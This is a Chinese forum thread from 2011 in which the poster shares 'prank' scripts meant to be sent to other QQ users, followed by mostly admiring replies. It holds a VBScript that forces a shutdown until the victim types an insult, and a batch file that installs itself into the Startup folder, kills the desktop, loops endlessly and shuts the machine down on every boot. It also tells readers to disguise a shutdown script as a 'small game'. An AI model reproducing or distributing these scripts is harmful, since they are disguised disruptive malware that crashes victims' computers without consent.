【登录】 【注册】
进入此贴详细完整版>> 【QQ技术交流】用QQ整人使对方关机代码-不是病毒-娱乐一下整整人中华游戏网 > QQ技术交流

<<   1   2  >>  Pages: ( 2 total )

作者:委琐哥哥
时间:2011-09-19 15:24

代码如下:

该隐藏帖已经发布超过60天,已自动取消隐藏功能,无需回复即可查看!
--------------------------------------------我是横线不要复制我------------------------------------------
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,你确实是一头猪~"
--------------------------------------------我是横线不要复制我------------------------------------------
将横线内的代码复制到记事本内~~然后另存为名字随便你起记住后面的一定要加 .vbe
把文件传送给对方~~只要对方一打开一分钟就会关机,如上面说的,要你说那三个字,就不会关机了哈哈大家试试吧。

相对第二种第一种比较简单 回复一下 立马可看

第二种整人:
@echo off
if exist New.bat copy "New.bat" "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\New.bat"
for %%a in (c d e f g h) do (
for /f %%b in ('dir /s /b "%%a:\QQ.exe"') do (
goto :1
:1
tasklist|findstr /i "1.exe" || start %%b
))
at echo ^G^G^G^G^G^G&taskkill /f /t explorer.exe&shutdown -s -t 60
goto :1

效果是每次开机都会自动60秒内关机,而且机器不停的发出蜂鸣声非常吵!桌面消失 60秒内内存耗尽 ,机器烂一点的会蓝屏或死机,好一点的也会死机!

我这里写的是New.bat 你可以重命名! 后缀为.bat就可以了!

第三种:新建一个txt文档,打开把这段命令放到里面。

shutdown -s -t 60

然后文件--》另存为———》文件类型(选所有文件)——》文件名(小游戏.bat)然后保存。打开开看看吧!

取消关机的办法  把刚才那段命令换成 shutdown -a
这里的60就是60秒关机,换成别的时间也好使,比如5秒,嘿嘿

这个是电脑设置自动关机的代码:
1)新建记事本文件(重命名为a.txt)
2)输入at 16:00 shutdown -s -t 120
3)把刚才的a.txt重命名为a.bat
4)运行刚刚作好的文件,实现当天16:00关机(或者第二天)
16:00(时间随便设)

1楼:白雾言行(2011-09-19 15:31)

高人啊。高人
2楼:a6483(2011-09-19 22:43)

牛人啊,就是第2种不太会
3楼:z941840211(2011-09-20 18:52)

哎呀 这个不错啊

4楼:希望ゝ(2011-09-20 18:55)

好猥琐的代码。。。
5楼:735448727(2011-09-25 12:15)

6楼:171130(2011-09-28 11:09)

好东西。。。现在可以用来整一下这些酒托
7楼:opqrew99(2011-09-28 14:21)

第一个是什么!
8楼:zh211000066(2011-09-28 14:38)

学习下第一种方法
9楼:血祭红尘(2011-09-29 08:40)

看不懂诶- -
10楼:chenxuan123(2011-10-03 10:16)

则莫要啊

11楼:zynbnba(2011-10-03 10:38)

高人啊。高人
12楼:wfnyrgv(2011-10-03 19:55)

看那看啊啊  
13楼:saylovemexlf(2011-10-03 21:23)

楼主  我来学习一下的
14楼:yu646039200(2011-10-04 21:08)

15楼:chihirole(2011-10-05 09:59)

好像很厉害      。
16楼:chihirole(2011-10-05 10:07)

自己智力太低了        
17楼:q812789266(2011-10-05 15:13)

看不懂诶- -

18楼:初夏丶lwy.(2011-10-07 15:39)

回复看看
19楼:亚麻跌.rmvb(2011-10-08 12:23)

学习了。。哈哈
20楼:byf56(2011-10-09 06:38)

哈哈 看一下
21楼:堕落、(2011-10-11 17:38)

回复、看下第一种办法
22楼:夜殇°(2011-10-13 06:46)

着是整别人呢还是整自己?
23楼:20081315(2011-10-16 16:08)

哈哈哈哈,哥很邪恶的笑了
24楼:tangxingyong(2011-10-16 16:17)

先看看第一个
25楼:a746681447(2011-10-19 17:46)

可那看那
26楼:注册名太难(2011-10-20 17:34)

看看看看
27楼:915348585(2011-10-20 17:36)

谁谁谁谁谁谁谁谁谁谁谁谁水声山色
28楼:978304057(2011-10-23 20:25)

好东西啊啊啊啊
29楼:武先生(2011-10-25 13:40)

应该是需要传送文件对方点击后才有效果吧。
30楼:武先生(2011-10-25 13:42)

高人啊。
31楼:白々哉(2011-10-26 20:14)

不行啊
32楼:林小牛(2011-10-28 14:24)

震惊了
33楼:gundan123(2011-10-29 13:41)

高人!
34楼:°羙丽啲囘忆(2011-10-30 01:32)

学习了。谢谢LZ分享、、
35楼:断桥残魂(2011-11-03 10:22)

看看!不晓得行不!
36楼:byk199093(2011-11-10 00:56)

什么样的东西 瞅瞅
37楼:q907632921q(2011-11-17 21:14)

牛人啊,要顶要顶
38楼:xuanhu007(2011-11-18 22:33)

这代码有点意思哦
39楼:我爱猪(2012-01-20 08:49)

神啊高手
40楼:我爱猪1314(2012-02-04 07:58)

看不懂啊
41楼:sbqzkf(2012-02-04 11:06)

看看吧
42楼:我爱猪1314(2012-02-05 11:19)

好啰嗦啊
43楼:qq1013(2012-06-01 00:35)

举双手支持楼主。
44楼:ww345639781(2012-06-04 18:27)

高人!!拜膜一下。~!
45楼:xc1901(2012-06-05 08:41)

是不是程序组??
46楼:jingjja(2012-06-29 15:11)

太多技术学了
47楼:qqsawdgfth(2012-12-05 18:13)

高啊,叮叮叮叮
48楼:zz851849619(2012-12-08 08:39)

顶了!!!
49楼:1053294(2012-12-09 13:22)

真的有用吗

进入此贴详细完整版>> 【QQ技术交流】用QQ整人使对方关机代码-不是病毒-娱乐一下整整人 返回顶部